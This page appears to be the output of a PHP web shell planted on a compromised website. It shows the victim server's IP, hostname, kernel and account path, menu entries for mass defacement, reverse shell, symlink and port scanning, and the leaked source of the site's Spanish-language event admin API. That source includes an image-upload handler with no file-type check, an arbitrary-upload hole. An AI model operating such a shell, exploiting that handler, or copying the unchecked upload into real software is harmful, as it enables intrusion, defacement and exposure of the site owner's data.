Tul xxx Tul
User / IP
:
216.73.216.146
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
eventos
/
admin
/
Viewing: api.php
<?php session_start(); header('Content-Type: application/json'); // Verificar autenticación if (!isset($_SESSION['admin_user'])) { echo json_encode(['success' => false, 'message' => 'No autorizado']); exit; } require_once 'includes/db.php'; $db = getDB(); $action = $_POST['action'] ?? ''; $response = ['success' => false, 'message' => 'Acción no válida']; try { switch ($action) { // ============ USERS ============ case 'save_user': $id = $_POST['id'] ?? ''; $name = trim($_POST['name'] ?? ''); $email = trim($_POST['email'] ?? ''); $password = $_POST['password'] ?? ''; $role = $_POST['role'] ?? 'admin'; if (!$name || !$email) { $response = ['success' => false, 'message' => 'Nombre y email son obligatorios']; break; } if ($id) { // Update if ($password) { $hash = password_hash($password, PASSWORD_DEFAULT); $stmt = $db->prepare('UPDATE users SET name=?, email=?, password=?, role=? WHERE id=?'); $stmt->execute([$name, $email, $hash, $role, $id]); } else { $stmt = $db->prepare('UPDATE users SET name=?, email=?, role=? WHERE id=?'); $stmt->execute([$name, $email, $role, $id]); } $response = ['success' => true, 'message' => 'Usuario actualizado']; } else { // Insert if (!$password) { $response = ['success' => false, 'message' => 'La contraseña es obligatoria para nuevos usuarios']; break; } $hash = password_hash($password, PASSWORD_DEFAULT); $stmt = $db->prepare('INSERT INTO users (name, email, password, role) VALUES (?, ?, ?, ?)'); $stmt->execute([$name, $email, $hash, $role]); $response = ['success' => true, 'message' => 'Usuario creado']; } break; case 'delete_user': $id = $_POST['id'] ?? ''; if ($id == $_SESSION['admin_user']['id']) { $response = ['success' => false, 'message' => 'No puedes eliminar tu propia cuenta']; break; } $stmt = $db->prepare('DELETE FROM users WHERE id = ?'); $stmt->execute([$id]); $response = ['success' => true, 'message' => 'Usuario eliminado']; break; // ============ HERO ============ case 'save_hero': $stmt = $db->prepare('UPDATE hero_settings SET name = ?, subtitle = ?, description = ?, media_type = ?, bg_media_type = ?, media_shape = ? WHERE id = 1'); $stmt->execute([ trim($_POST['name'] ?? ''), trim($_POST['subtitle'] ?? ''), trim($_POST['description'] ?? ''), $_POST['media_type'] ?? 'image', $_POST['bg_media_type'] ?? 'color', $_POST['media_shape'] ?? 'circle' ]); $response = ['success' => true, 'message' => 'Hero actualizado']; break; case 'upload_hero_image': if (isset($_FILES['image']) && $_FILES['image']['error'] === 0) { $uploadDir = '../public/assets/images/'; $ext = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION)); $allowed = ['jpg', 'jpeg', 'png', 'webp', 'gif']; if (!in_array($ext, $allowed)) { $response = ['success' => false, 'message' => 'Formato no permitido']; break; } $filename = 'portada_' . time() . '.' . $ext; $path = $uploadDir . $filename; if (move_uploaded_file($_FILES['image']['tmp_name'], $path)) { $relativePath = 'public/assets/images/' . $filename; $db->prepare('UPDATE hero_settings SET portrait_image=? WHERE id=1')->execute([$relativePath]); $response = ['success' => true, 'message' => 'Imagen subida', 'path' => $relativePath]; } else { $response = ['success' => false, 'message' => 'Error al mover archivo']; } } break; case 'upload_hero_video': if (isset($_FILES['video']) && $_FILES['video']['error'] === 0) { $uploadDir = '../public/assets/images/'; $ext = strtolower(pathinfo($_FILES['video']['name'], PATHINFO_EXTENSION)); $allowed = ['mp4', 'webm', 'ogg']; if (!in_array($ext, $allowed)) { $response = ['success' => false, 'message' => 'Formato no permitido (solo MP4, WebM, OGG)']; break; } $filename = 'hero_video_' . time() . '.' . $ext; $path = $uploadDir . $filename; if (move_uploaded_file($_FILES['video']['tmp_name'], $path)) { $relativePath = 'public/assets/images/' . $filename; $db->prepare('UPDATE hero_settings SET video_path=? WHERE id=1')->execute([$relativePath]); $response = ['success' => true, 'message' => 'Video subido', 'path' => $relativePath]; } else { $response = ['success' => false, 'message' => 'Error al mover archivo']; } } break; case 'upload_hero_bg_image': if (isset($_FILES['image']) && $_FILES['image']['error'] === 0) { $uploadDir = '../public/assets/images/'; $ext = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION)); $filename = 'hero_bg_' . time() . '.' . $ext; $path = $uploadDir . $filename; if (move_uploaded_file($_FILES['image']['tmp_name'], $path)) { $relativePath = 'public/assets/images/' . $filename; $db->prepare('UPDATE hero_settings SET bg_image_path=? WHERE id=1')->execute([$relativePath]); $response = ['success' => true, 'message' => 'Fondo de imagen subido', 'path' => $relativePath]; } } break; case 'upload_hero_bg_video': if (isset($_FILES['video']) && $_FILES['video']['error'] === 0) { $uploadDir = '../public/assets/images/'; $ext = strtolower(pathinfo($_FILES['video']['name'], PATHINFO_EXTENSION)); $allowed = ['mp4', 'webm', 'ogg']; if (in_array($ext, $allowed)) { $filename = 'hero_bg_video_' . time() . '.' . $ext; $path = $uploadDir . $filename; if (move_uploaded_file($_FILES['video']['tmp_name'], $path)) { $relativePath = 'public/assets/images/' . $filename; $db->prepare('UPDATE hero_settings SET bg_video_path=? WHERE id=1')->execute([$relativePath]); $response = ['success' => true, 'message' => 'Fondo de video subido', 'path' => $relativePath]; } } } break; // ============ COUNTDOWN ============ case 'save_countdown': $stmt = $db->prepare('UPDATE countdown_settings SET event_date=?, section_title=?, section_subtitle=?, is_active=? WHERE id=1'); $stmt->execute([ $_POST['event_date'] ?? '', trim($_POST['section_title'] ?? ''), trim($_POST['section_subtitle'] ?? ''), intval($_POST['is_active'] ?? 0) ]); $response = ['success' => true, 'message' => 'Countdown actualizado']; break; // ============ TIMELINE ============ case 'save_timeline': $id = $_POST['id'] ?? ''; $data = [ trim($_POST['event_time'] ?? ''), trim($_POST['icon'] ?? 'ph-fill ph-star'), trim($_POST['title'] ?? ''), intval($_POST['sort_order'] ?? 0) ]; if ($id) { $stmt = $db->prepare('UPDATE timeline_events SET event_time=?, icon=?, title=?, sort_order=? WHERE id=?'); $stmt->execute([...$data, $id]); $response = ['success' => true, 'message' => 'Evento actualizado']; } else { $stmt = $db->prepare('INSERT INTO timeline_events (event_time, icon, title, sort_order) VALUES (?,?,?,?)'); $stmt->execute($data); $response = ['success' => true, 'message' => 'Evento creado']; } break; case 'delete_timeline': $db->prepare('DELETE FROM timeline_events WHERE id=?')->execute([$_POST['id']]); $response = ['success' => true, 'message' => 'Evento eliminado']; break; // ============ GALLERY ============ case 'upload_gallery_image': if (isset($_FILES['image']) && $_FILES['image']['error'] === 0) { $uploadDir = '../public/assets/images/historia/'; if (!is_dir($uploadDir)) mkdir($uploadDir, 0755, true); $file = $_FILES['image']; $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)); $imgExts = ['jpg', 'jpeg', 'png', 'webp', 'gif']; $vidExts = ['mp4', 'webm', 'ogg']; $mediaType = 'image'; if (in_array($ext, $vidExts)) { $mediaType = 'video'; } elseif (!in_array($ext, $imgExts)) { $response = ['success' => false, 'message' => 'Formato no permitido (JPG, PNG, WEBP, GIF, MP4, WEBM, OGG)']; break; } $filename = 'gallery_' . time() . '_' . rand(100, 999) . '.' . $ext; $path = $uploadDir . $filename; if (move_uploaded_file($file['tmp_name'], $path)) { $relativePath = 'public/assets/images/historia/' . $filename; $stmt = $db->prepare('INSERT INTO gallery_images (image_path, media_type, alt_text, sort_order) VALUES (?, ?, ?, ?)'); $stmt->execute([$relativePath, $mediaType, '', 0]); $response = ['success' => true, 'message' => ucfirst($mediaType) . ' subido correctamente']; } else { $response = ['success' => false, 'message' => 'Error al mover el archivo']; } } break; case 'delete_gallery_image': $img = $db->prepare('SELECT image_path FROM gallery_images WHERE id=?'); $img->execute([$_POST['id']]); $row = $img->fetch(); if ($row) { $filePath = '../' . $row['image_path']; if (file_exists($filePath)) @unlink($filePath); $db->prepare('DELETE FROM gallery_images WHERE id=?')->execute([$_POST['id']]); } $response = ['success' => true, 'message' => 'Imagen eliminada']; break; // ============ PANELS ============ case 'save_panel': $id = $_POST['id'] ?? ''; $data = [ trim($_POST['icon'] ?? 'ph-fill ph-star'), trim($_POST['title'] ?? ''), trim($_POST['subtitle'] ?? ''), trim($_POST['description'] ?? ''), intval($_POST['sort_order'] ?? 0) ]; if ($id) { $stmt = $db->prepare('UPDATE info_panels SET icon=?, title=?, subtitle=?, description=?, sort_order=? WHERE id=?'); $stmt->execute([...$data, $id]); $response = ['success' => true, 'message' => 'Panel actualizado']; } else { $stmt = $db->prepare('INSERT INTO info_panels (icon, title, subtitle, description, sort_order) VALUES (?,?,?,?,?)'); $stmt->execute($data); $response = ['success' => true, 'message' => 'Panel creado']; } break; case 'delete_panel': $db->prepare('DELETE FROM info_panels WHERE id=?')->execute([$_POST['id']]); $response = ['success' => true, 'message' => 'Panel eliminado']; break; // ============ GUESTBOOK ============ case 'delete_message': $db->prepare('DELETE FROM guestbook_messages WHERE id=?')->execute([$_POST['id']]); $response = ['success' => true, 'message' => 'Mensaje eliminado']; break; // ============ RSVP ============ case 'delete_rsvp': $db->prepare('DELETE FROM rsvp_confirmations WHERE id=?')->execute([$_POST['id']]); $response = ['success' => true, 'message' => 'Confirmación eliminada']; break; // ============ LOCATION ============ case 'save_location': $mapUrl = trim($_POST['map_embed_url'] ?? ''); if (strpos($mapUrl, '<iframe') !== false && preg_match('/src=["\']([^"\']+)["\']/i', $mapUrl, $matches)) { $mapUrl = $matches[1]; } $stmt = $db->prepare('UPDATE location_settings SET venue_name=?, address=?, date_text=?, time_text=?, map_embed_url=?, directions_url=? WHERE id=1'); $stmt->execute([ trim($_POST['venue_name'] ?? ''), trim($_POST['address'] ?? ''), trim($_POST['date_text'] ?? ''), trim($_POST['time_text'] ?? ''), $mapUrl, trim($_POST['directions_url'] ?? '') ]); $response = ['success' => true, 'message' => 'Ubicación actualizada']; break; // ============ CTA ============ case 'save_cta': $stmt = $db->prepare('UPDATE cta_settings SET title=?, description=?, deadline_text=?, button_text=? WHERE id=1'); $stmt->execute([ trim($_POST['title'] ?? ''), trim($_POST['description'] ?? ''), trim($_POST['deadline_text'] ?? ''), trim($_POST['button_text'] ?? '') ]); $response = ['success' => true, 'message' => 'CTA actualizado']; break; // ============ SETTINGS ============ case 'save_settings': $settingsKeys = [ 'site_title', 'monogram', 'whatsapp_number', 'footer_brand', 'footer_link', 'overlay_title', 'overlay_subtitle', 'overlay_instruction', 'overlay_letter_pre', 'overlay_letter_title', 'overlay_letter_post', 'color_bg', 'color_text', 'color_purple', 'color_gold', 'dark_bg', 'dark_text', 'dark_purple', 'dark_gold', 'whatsapp_msg_yes', 'whatsapp_msg_no', 'overlay_flowers_image', 'music_file', 'music_enabled', 'special_effects_type', 'site_theme', 'story_show', 'story_title', 'story_content', 'story_image', 'quote_show', 'quote_text', 'quote_author', 'site_font_primary', 'site_font_secondary', 'share_title', 'share_text', 'footer_text' ]; // Manejar subida de imagen de historia if (isset($_FILES['story_image']) && $_FILES['story_image']['error'] === 0) { $uploadDir = '../public/assets/images/'; $ext = strtolower(pathinfo($_FILES['story_image']['name'], PATHINFO_EXTENSION)); $allowed = ['jpg', 'jpeg', 'png', 'webp', 'gif']; if (in_array($ext, $allowed)) { $filename = 'story_' . time() . '.' . $ext; $path = $uploadDir . $filename; if (move_uploaded_file($_FILES['story_image']['tmp_name'], $path)) { $db->prepare('UPDATE site_settings SET setting_value = ? WHERE setting_key = ?') ->execute(['public/assets/images/' . $filename, 'story_image']); } } } // Manejar subida de imagen de overlay if (isset($_FILES['overlay_flowers_image']) && $_FILES['overlay_flowers_image']['error'] === 0) { $uploadDir = '../public/assets/images/'; if (!is_dir($uploadDir)) mkdir($uploadDir, 0755, true); $ext = strtolower(pathinfo($_FILES['overlay_flowers_image']['name'], PATHINFO_EXTENSION)); $allowed = ['jpg', 'jpeg', 'png', 'webp', 'gif']; if (in_array($ext, $allowed)) { $filename = 'overlay_decor_' . time() . '.' . $ext; $path = $uploadDir . $filename; if (move_uploaded_file($_FILES['overlay_flowers_image']['tmp_name'], $path)) { $db->prepare('UPDATE site_settings SET setting_value = ? WHERE setting_key = ?') ->execute(['public/assets/images/' . $filename, 'overlay_flowers_image']); } } } // Manejar subida de música if (isset($_FILES['music_file']) && $_FILES['music_file']['error'] === 0) { $uploadDir = '../public/assets/images/'; $ext = strtolower(pathinfo($_FILES['music_file']['name'], PATHINFO_EXTENSION)); $allowed = ['mp3', 'ogg', 'wav']; if (in_array($ext, $allowed)) { $filename = 'musica_' . time() . '.' . $ext; $path = $uploadDir . $filename; if (move_uploaded_file($_FILES['music_file']['tmp_name'], $path)) { $db->prepare('UPDATE site_settings SET setting_value = ? WHERE setting_key = ?') ->execute(['public/assets/images/' . $filename, 'music_file']); } } } $stmt = $db->prepare('UPDATE site_settings SET setting_value = ? WHERE setting_key = ?'); foreach ($settingsKeys as $key) { if ($key === 'overlay_flowers_image' || $key === 'story_image' || $key === 'music_file') continue; if (isset($_POST[$key])) { $stmt->execute([trim($_POST[$key]), $key]); } } $response = ['success' => true, 'message' => 'Configuración guardada']; break; } } catch (Exception $e) { $response = ['success' => false, 'message' => 'Error: ' . $e->getMessage()]; } echo json_encode($response);
Coded With 💗 by
0x6ick